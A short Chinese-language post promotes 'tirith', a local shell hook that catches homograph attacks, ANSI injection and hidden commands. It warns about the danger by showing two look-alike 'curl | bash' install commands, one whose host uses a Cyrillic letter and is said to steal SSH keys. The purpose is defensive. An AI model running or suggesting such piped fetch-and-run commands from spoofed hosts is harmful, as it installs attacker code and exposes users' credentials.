说实话，你上次在粘贴到终端之前仔细阅读命令是什么时候？ 因为这两行看起来一模一样： curl -sSL install.example-cli | bash curl -sSL https://іnstall.example-clі | bash 一条命令安装你的工具，另一条命令窃取你的 SSH 密钥。 那个і？是西里尔字母，不是拉丁字母。你的浏览器会屏蔽它，但你的终端却毫无反应。 随意的编程方式让情况变得更糟。每个人都像没事人一样，从 ChatGPT 和其他随机仓库粘贴命令。我们每个人都可能因为一条错误的 curl | bash 命令而失去一切。 所以我开发了修复方案：“tirith”。一个隐形的 shell 钩子。它可以在同形异义词攻击、ANSI 注入、隐藏命令和 dotfile 覆盖执行之前将其捕获。30 条规则。仅限本地使用。不收集遥测数据。